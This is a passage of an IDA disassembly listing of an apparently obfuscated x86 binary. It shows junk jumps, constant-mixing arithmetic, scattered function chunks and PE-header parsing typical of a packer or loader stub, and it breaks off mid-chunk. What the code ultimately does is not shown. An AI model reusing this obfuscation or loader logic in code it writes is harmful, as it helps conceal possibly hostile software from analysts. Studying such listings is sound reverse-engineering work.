loc_42C2E5: ; CODE XREF: sub_423172:loc_42965F�j
jz loc_428DCA
jmp loc_4265E8
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A2B
loc_42C2F0: ; CODE XREF: sub_424A2B+5428�j
jz loc_42C99B
loc_42C2F6: ; CODE XREF: sub_42D245+14�j
jmp loc_42F2DF
; END OF FUNCTION CHUNK FOR sub_424A2B
; ---------------------------------------------------------------------------
jz loc_429BA3
shl esi, 0Eh
jmp loc_42C99B
; ---------------------------------------------------------------------------
or ebp, esi
jmp loc_428800
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_42C310: ; CODE XREF: sub_4270E6-1F69�j
jo loc_42C9F9
shl esi, 11h
xor esi, 4AA1FDCBh
jmp loc_425C7C
; END OF FUNCTION CHUNK FOR sub_4270E6
; ---------------------------------------------------------------------------
loc_42C324: ; CODE XREF: _7hdaygc1:00425EAB�j
pop ecx
xor ecx, 5173C961h
add ecx, 533F2689h
rol ecx, 2
xor ecx, 6A3F2160h
call sub_4264C0
; START OF FUNCTION CHUNK FOR sub_42A17C
loc_42C33F: ; CODE XREF: sub_42A17C+C�j
jmp loc_42ED93
; END OF FUNCTION CHUNK FOR sub_42A17C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_42C344: ; CODE XREF: sub_425BAD+F�j
jmp loc_4267DF
; END OF FUNCTION CHUNK FOR sub_425BAD
; ---------------------------------------------------------------------------
pop esi
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42C34A: ; CODE XREF: sub_42C50D:loc_42A12E�j
test eax, ebx
jmp loc_42CD19
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DAE
loc_42C351: ; CODE XREF: sub_423DAE+B�j
and esi, 9181F6FDh
xor esi, 820DEC88h
add edx, esi
pop esi
; END OF FUNCTION CHUNK FOR sub_423DAE
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42C360: ; CODE XREF: sub_42E283:loc_42C090�j
mov edx, [edx]
jmp loc_42A8FB
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
loc_42C367: ; CODE XREF: _7hdaygc1:00424728�j
mov eax, [esi]
; =============== S U B R O U T I N E =======================================
sub_42C369 proc near ; CODE XREF: sub_426A39:loc_426A4E�p
; FUNCTION CHUNK AT 004243CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426357 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427276 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AACF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042E93F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F442 SIZE 00000004 BYTES
xchg ecx, [esp+0]
pop ecx
xor [ebp-4], eax
inc dword ptr [ebp-8]
dec dword ptr [ebp-0Ch]
jmp loc_42AACF
sub_42C369 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42C37C: ; CODE XREF: sub_4291EA+1920�j
jmp loc_42BD6D
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_42C381: ; CODE XREF: sub_42E695+7�j
mov eax, ds:dword_42BC38
or eax, eax
jnz loc_42F1B1
jmp loc_424B2A
; END OF FUNCTION CHUNK FOR sub_42E695
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42C394: ; CODE XREF: sub_42C443+588�j
call sub_424D65
loc_42C399: ; CODE XREF: sub_42EBFB+23�j
jmp loc_42A2A2
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
loc_42C39E: ; CODE XREF: _7hdaygc1:loc_429054�j
mov al, [eax]
add [ebp-0Ah], al
xor eax, eax
mov al, [ebp-0Ah]
shr eax, 4
xor [ebp-0Ah], al
jmp loc_42E5EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42874A
loc_42C3B3: ; CODE XREF: sub_42874A:loc_4236A9�j
jge loc_429622
; END OF FUNCTION CHUNK FOR sub_42874A
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42C3B9: ; CODE XREF: sub_42F65A-98A9�j
jmp loc_42F0E9
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
js loc_42E242
add ebp, 9E68A23Dh
jmp loc_429620
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D757
loc_42C3CF: ; CODE XREF: sub_42D757:loc_42E814�j
mov eax, offset dword_427C94
call sub_427D8E
call sub_42ABF7
loc_42C3DE: ; CODE XREF: _7hdaygc1:0042ECE0�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_42D757
; ---------------------------------------------------------------------------
loc_42C3E3: ; CODE XREF: _7hdaygc1:0042ABD3�j
cdq
; =============== S U B R O U T I N E =======================================
sub_42C3E4 proc near ; CODE XREF: sub_42C1AF-71A�p
; FUNCTION CHUNK AT 0042A243 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B67E SIZE 00000011 BYTES
xchg esi, [esp+0]
pop esi
mov [ebp-8], edx
jmp loc_42A243
sub_42C3E4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push eax
ror eax, 6
mov ds:dword_4246B4, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42C3FB: ; CODE XREF: sub_42C50D+3880�j
jmp loc_42A12E
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_42C400: ; CODE XREF: sub_42C26B+11�j
jmp loc_423C38
; END OF FUNCTION CHUNK FOR sub_42C26B
; =============== S U B R O U T I N E =======================================
sub_42C405 proc near ; CODE XREF: sub_42EB2C�j
; FUNCTION CHUNK AT 0042CA03 SIZE 0000000C BYTES
push ebx
jmp loc_42CA03
sub_42C405 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_42C40B: ; CODE XREF: sub_4273CA-3904�j
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_42B644
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
jmp loc_42F48C
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E347
loc_42C427: ; CODE XREF: sub_42E347+18�j
add eax, [ebp-4]
xor edx, edx
push edx
push eax
jmp loc_425F81
; END OF FUNCTION CHUNK FOR sub_42E347
; ---------------------------------------------------------------------------
locret_42C433: ; CODE XREF: _7hdaygc1:00428D45�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42C434: ; CODE XREF: sub_423DFC+A81B�j
jmp loc_429850
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42C439: ; CODE XREF: sub_42AA47:loc_42E77E�j
push offset loc_4287C2
jmp nullsub_125
; END OF FUNCTION CHUNK FOR sub_42AA47
; =============== S U B R O U T I N E =======================================
sub_42C443 proc near ; CODE XREF: _7hdaygc1:0042700D�j
; sub_42BAE7+2FAA�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042340B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042358F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004239BA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00423F15 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042454B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00424AA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424EDA SIZE 00000030 BYTES
; FUNCTION CHUNK AT 00425687 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426245 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042642A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427088 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427D4F SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0042876A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004287A1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004293C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042985B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429BF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A2A2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A9D3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042ABF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B362 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042BF45 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C394 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C9BC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042CD34 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CDC2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042CF6F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042CF92 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042D2D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D88A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042D974 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042E04C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E8CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042EBAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EF15 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F235 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F411 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042F7FD SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042FA52 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
jnz loc_427D5D
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
jmp loc_427D4F
sub_42C443 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD68
loc_42C45B: ; CODE XREF: sub_42FD68-A5E1�j
pushf
sbb ecx, eax
loc_42C45E: ; CODE XREF: sub_42FD68-A5EF�j
add ecx, 911D7B60h
xchg ecx, [esp+4+var_4]
jmp sub_42D471
; END OF FUNCTION CHUNK FOR sub_42FD68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42C46C: ; CODE XREF: sub_426130:loc_42D0CA�j
jnz loc_4235C0
loc_42C472: ; CODE XREF: sub_42F967+7�j
jmp sub_428C3B
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D65
loc_42C477: ; CODE XREF: sub_425D65+7B63�j
jmp loc_42E802
; END OF FUNCTION CHUNK FOR sub_425D65
; ---------------------------------------------------------------------------
loc_42C47C: ; CODE XREF: _7hdaygc1:00425B30�j
jmp locret_42561E
; ---------------------------------------------------------------------------
add ebx, 3618D0DDh
jmp loc_4235A8
; =============== S U B R O U T I N E =======================================
sub_42C48C proc near ; CODE XREF: sub_42A104-461B�p
; _7hdaygc1:00428F90�j
; FUNCTION CHUNK AT 0042589C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042A4F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B0D4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042C0B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E238 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042F5F3 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_42C0B7
sub_42C48C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor eax, edi
jmp sub_42D01B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_42C4A2: ; CODE XREF: sub_42567E+8D09�j
ja loc_42D902
jmp loc_42DA52
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
xchg esi, [edi]
jmp sub_42E481
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_42C4B4: ; CODE XREF: sub_42A92E:loc_42ED9E�j
xchg eax, esi
jle loc_425673
jmp sub_42DAF7
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
loc_42C4C1: ; DATA XREF: sub_42B74A-4760�o
add ebx, 26F474D1h
mov [ebx], eax
pop ebx
push 400h
jmp loc_42DB08
; ---------------------------------------------------------------------------
mov edx, 17B3C1CFh
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42C4D9: ; CODE XREF: sub_424F62:loc_42CF2A�j
call sub_42C1AF
push eax
ror eax, 6
mov ds:dword_4246B4, eax
jmp nullsub_157
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
loc_42C4ED: ; CODE XREF: sub_42616B:loc_4280E8�j
or eax, eax
jnz loc_424053
jmp loc_426658
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
call sub_428C3B
mov [ebp-0Ch], eax
rol eax, 8
mov [ebp-10h], eax
jmp loc_42BC78
; =============== S U B R O U T I N E =======================================
sub_42C50D proc near ; CODE XREF: sub_4268D9-F29�j
; sub_42936E+6725�p
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423873 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00423D3A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00424F50 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00425D16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A12E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042BC28 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C34A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C3FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CD19 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042CDE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E771 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042F5A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FD87 SIZE 0000000B BYTES
jno loc_42F5A2
push ebp
mov ebp, ecx
xchg ebp, [esp+0]
push ebp
add ecx, 0F05B0D45h
loc_42C520: ; CODE XREF: _7hdaygc1:00425F21�j
jmp loc_423873
sub_42C50D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test ecx, 8EE9DB78h
jmp loc_42BBC1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BFC
loc_42C530: ; CODE XREF: sub_425BFC:loc_42F36D�j
jnz loc_42C543
call sub_42D2E7
or eax, eax
jnz nullsub_120
loc_42C543: ; CODE XREF: _7hdaygc1:loc_427001�j
; sub_425BFC:loc_42C530�j
call sub_42AFB3
jmp loc_4246BD
; END OF FUNCTION CHUNK FOR sub_425BFC
; ---------------------------------------------------------------------------
loc_42C54D: ; DATA XREF: sub_42CDF7-818D�o
pop ebx
pop ebx
xchg edi, [esp]
mov ecx, edi
xchg ebx, [esp]
mov edi, ebx
pop ebx
pop ecx
jmp loc_42BDFB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429412
loc_42C560: ; CODE XREF: sub_429412-29FA�j
; sub_429412+11�j
rol ebx, 11h
add ebx, 0F92F7E64h
add ebx, ebp
add ebx, 13AF0834h
push offset loc_42351E
jmp loc_42FC9B
; END OF FUNCTION CHUNK FOR sub_429412
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_42C57B: ; CODE XREF: _7hdaygc1:0042AF4D�j
; sub_42D9E1:loc_42C6BF�j
xor edx, 4F648490h
rol edx, 15h
test edx, 400000h
jmp loc_42A0D6
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
sbb esi, edi
jmp loc_42EEC8
; ---------------------------------------------------------------------------
loc_42C596: ; CODE XREF: _7hdaygc1:004271E8�j
add ebx, 56E65D54h
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_42C59C: ; CODE XREF: sub_42A92E:loc_4271C2�j
add eax, 94721A23h
add eax, ebp
add eax, 0E78DE427h
mov [eax], ebx
jmp loc_42B255
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
loc_42C5B1: ; DATA XREF: sub_42EBD6-4DA�o
push 4F4A9F38h
pop esi
and esi, 16B125CAh
add esi, 0F9FFD8F7h
and edx, esi
pop esi
xor [esi], edx
mov eax, 80000000h
jmp loc_423AF1
; ---------------------------------------------------------------------------
loc_42C5D2: ; CODE XREF: _7hdaygc1:loc_428F07�j
rol eax, 19h
jmp loc_42C8F0
; ---------------------------------------------------------------------------
loc_42C5DA: ; CODE XREF: _7hdaygc1:004287BD�j
add ebx, 65B383D1h
cmp ebx, 7FE2908h
jmp loc_4254AA
; ---------------------------------------------------------------------------
loc_42C5EB: ; DATA XREF: sub_4232DA+644C�o
add eax, 0B18378FDh
push offset sub_4269CB
jmp locret_4241F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
loc_42C5FC: ; CODE XREF: sub_42B470+430D�j
jmp loc_428C0B
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
loc_42C601: ; CODE XREF: _7hdaygc1:0042A44F�j
cmp esi, 0F32E4AFEh
jmp loc_42EF8B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42C60D: ; CODE XREF: sub_424F62:loc_429F4D�j
jmp loc_426FC2
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
loc_42C612: ; CODE XREF: _7hdaygc1:loc_42F7F8�j
xchg ebx, [esp]
jmp sub_427D8E
; ---------------------------------------------------------------------------
cmp ds:dword_42BC60, 0
jnz loc_42E978
jmp loc_42E03C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42C62C: ; CODE XREF: sub_42C16F:loc_4280CA�j
or edx, 0CE9BAF93h
xor edx, 98DC5CC3h
sub edx, 956FA0A6h
xor edx, 78CBB0DDh
add edx, ebp
add edx, 36CC0D45h
mov edx, [edx]
add [edx], eax
loc_42C650: ; CODE XREF: sub_42567E:loc_42D8FC�j
jmp loc_426157
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_42C655: ; CODE XREF: _7hdaygc1:loc_42505B�j
shl esi, 8
jmp loc_42AA1F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_42C65E: ; CODE XREF: sub_4232DA+D98�j
ja loc_42BF64
jmp loc_428137
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_42C669: ; CODE XREF: sub_42B74A:loc_427CC1�j
test eax, eax
jz loc_424BDD
jmp loc_426484
; END OF FUNCTION CHUNK FOR sub_42B74A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_190. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42C677: ; CODE XREF: _7hdaygc1:0042C9E5�j
jz loc_42C15D
; =============== S U B R O U T I N E =======================================
sub_42C67D proc near ; CODE XREF: _7hdaygc1:00428210�p
xchg eax, [esp+0]
pop eax
push eax
jmp loc_426A53
sub_42C67D endp
; ---------------------------------------------------------------------------
loc_42C687: ; DATA XREF: _7hdaygc1:0042D9AE�o
mov ebp, esp
push ecx
mov esp, ebp
xchg edx, [esp]
mov ebp, edx
jmp loc_42520C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C763
loc_42C696: ; CODE XREF: sub_42C763:loc_42EB7F�j
call sub_4253A0
loc_42C69B: ; CODE XREF: sub_42CDF7+B78�j
jmp sub_42B942
; END OF FUNCTION CHUNK FOR sub_42C763
; =============== S U B R O U T I N E =======================================
sub_42C6A0 proc near ; CODE XREF: sub_42E1F1+A�p
; _7hdaygc1:0042F51D�j
; FUNCTION CHUNK AT 00423CC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A0F2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A77E SIZE 00000008 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-20h], eax
jmp loc_423CC7
sub_42C6A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E51C
loc_42C6AC: ; CODE XREF: sub_42E51C:loc_42FA7C�j
test byte ptr [ebp-8], 40h
jz loc_42A77E
push ebp
mov eax, [ebp-20h]
jmp loc_42A775
; END OF FUNCTION CHUNK FOR sub_42E51C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_42C6BF: ; CODE XREF: sub_42D9E1-3ECD�j
jge loc_42C57B
; END OF FUNCTION CHUNK FOR sub_42D9E1
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_42C6C5: ; CODE XREF: sub_42CFDA+B�j
jmp loc_429571
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
test edx, ecx
jmp loc_42E100
; ---------------------------------------------------------------------------
loc_42C6D1: ; CODE XREF: _7hdaygc1:00425CC1�j
popf
jle loc_42E3FB
sbb ebx, eax
cmp ecx, eax
jmp loc_42FDAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42C6E1: ; CODE XREF: sub_4291EA:loc_42A1F5�j
mov ebp, edx
pop edx
push 14A46CAFh
pop eax
sub eax, 0DC6F7BC0h
cmp eax, 50DC95BAh
jmp loc_42F974
; END OF FUNCTION CHUNK FOR sub_4291EA
; =============== S U B R O U T I N E =======================================
sub_42C6FB proc near ; CODE XREF: sub_42E076-8CB1�p
; _7hdaygc1:0042AC9D�j
; FUNCTION CHUNK AT 00423B47 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425AAF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A740 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-4]
mov eax, [eax]
cmp eax, [ebp-0Ch]
jz loc_4270F0
jmp loc_423B47
sub_42C6FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42C712 proc near ; CODE XREF: _7hdaygc1:00423B56�j
; sub_424E1F+F�p
; FUNCTION CHUNK AT 0042B20D SIZE 00000021 BYTES
xchg eax, [esp+0]
pop eax
push eax
ror eax, 8
loc_42C71A: ; CODE XREF: _7hdaygc1:loc_42F7F3�j
push ecx
push 1B82C966h
jmp loc_42B20D
sub_42C712 endp
; ---------------------------------------------------------------------------
loc_42C725: ; DATA XREF: sub_42409E:loc_42EA9B�o
call nullsub_218
; START OF FUNCTION CHUNK FOR sub_42BE7D
loc_42C72A: ; CODE XREF: sub_42BE7D+4�j
; sub_4240B0+B34A�j
mov eax, ds:dword_427CA0
mov [ebp-4], eax
mov eax, offset dword_427C94
call sub_42DBEA
mov eax, [ebp-4]
mov esp, ebp
jmp loc_42DBE8
; END OF FUNCTION CHUNK FOR sub_42BE7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425735
loc_42C746: ; CODE XREF: sub_425735+8F7D�j
jnz loc_42BB26
mov ecx, [ebx+edx-4]
or ecx, ecx
jmp loc_42B7FB
; ---------------------------------------------------------------------------
loc_42C757: ; CODE XREF: sub_425735:loc_42BB26�j
add edx, 14h
mov ecx, [ebx+edx-8]
jmp loc_42F9E0
; END OF FUNCTION CHUNK FOR sub_425735
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C763 proc near ; CODE XREF: sub_423144+5�p
; sub_423144+19�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042C696 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042EB7F SIZE 00000005 BYTES
push ebp
mov ebp, esp
jns sub_42EB24
add esp, 0FFFFFFE4h
loc_42C76F: ; CODE XREF: sub_42AA9B:loc_42ED11�j
mov [ebp+var_8], edx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_C], eax
jmp loc_42EB7F
sub_42C763 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BF7
loc_42C77F: ; CODE XREF: sub_426BF7:loc_4293B5�j
mov eax, [eax]
dec eax
call sub_42BAD5
loc_42C787: ; CODE XREF: sub_42ECAF+14�j
test al, al
jnz loc_42D0D5
; END OF FUNCTION CHUNK FOR sub_426BF7
; START OF FUNCTION CHUNK FOR sub_424B63
loc_42C78F: ; CODE XREF: sub_424B63+4�j
; sub_42E1F1:loc_42C025�j ...
pop ecx
pop ecx
pop ebp
jmp loc_42694D
; END OF FUNCTION CHUNK FOR sub_424B63
; ---------------------------------------------------------------------------
loc_42C797: ; CODE XREF: _7hdaygc1:0042F28C�j
jnz loc_42F718
xchg edi, [ecx]
add ecx, 1375D6BBh
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42C7A5: ; CODE XREF: sub_425E64:loc_42F277�j
and eax, ds:4000F9h
add eax, 0A4C80E62h
add eax, ebp
jmp loc_42BF51
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
loc_42C7B8: ; CODE XREF: _7hdaygc1:0042CDB1�j
and eax, 36CE6763h
sub eax, ds:4000F7h
add eax, 12BFCF0Fh
push offset sub_4240D4
jmp locret_428240
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_42C7D4: ; CODE XREF: sub_4273CA:loc_42424C�j
push eax
call sub_4252F5
mov [ebp-4], eax
jmp loc_4252E5
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42C7E2: ; CODE XREF: sub_423DDB:loc_42FC90�j
lea eax, [ebp-125h]
push eax
call sub_429FC3
; END OF FUNCTION CHUNK FOR sub_423DDB
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42C7EE: ; CODE XREF: sub_42AA07-1D9�j
jmp loc_42B886
; END OF FUNCTION CHUNK FOR sub_42AA07
; =============== S U B R O U T I N E =======================================
sub_42C7F3 proc near ; CODE XREF: _7hdaygc1:00423775�j
; sub_42F913+9�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423C7A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424202 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042552C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042604B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004265F5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426C4B SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00429203 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C1C9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C2AB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CE1B SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0042DAE5 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042DC0D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042DD3D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E837 SIZE 00000002 BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp-1Ch]
push eax
call sub_426CBB
push 29BAC713h
pop edx
jmp loc_4265F5
sub_42C7F3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42C80B: ; CODE XREF: sub_425752:loc_42C153�j
xor edi, 23B03CC1h
and edi, 0C11E7C88h
test edi, 1000h
jmp loc_42584B
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
loc_42C822: ; CODE XREF: _7hdaygc1:00426B4C�j
js loc_42A112
cmp esi, 62438BC3h
jmp loc_42CD49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F69
loc_42C833: ; CODE XREF: sub_428F69+2�j
pop edx
xchg edx, [esp+4+var_4]
push offset loc_42A28D
jmp nullsub_199
; END OF FUNCTION CHUNK FOR sub_428F69
; ---------------------------------------------------------------------------
loc_42C841: ; CODE XREF: _7hdaygc1:00423C64�j
call sub_423D6F
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42C846: ; CODE XREF: sub_42911B-E3�j
jmp sub_42F8B9
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
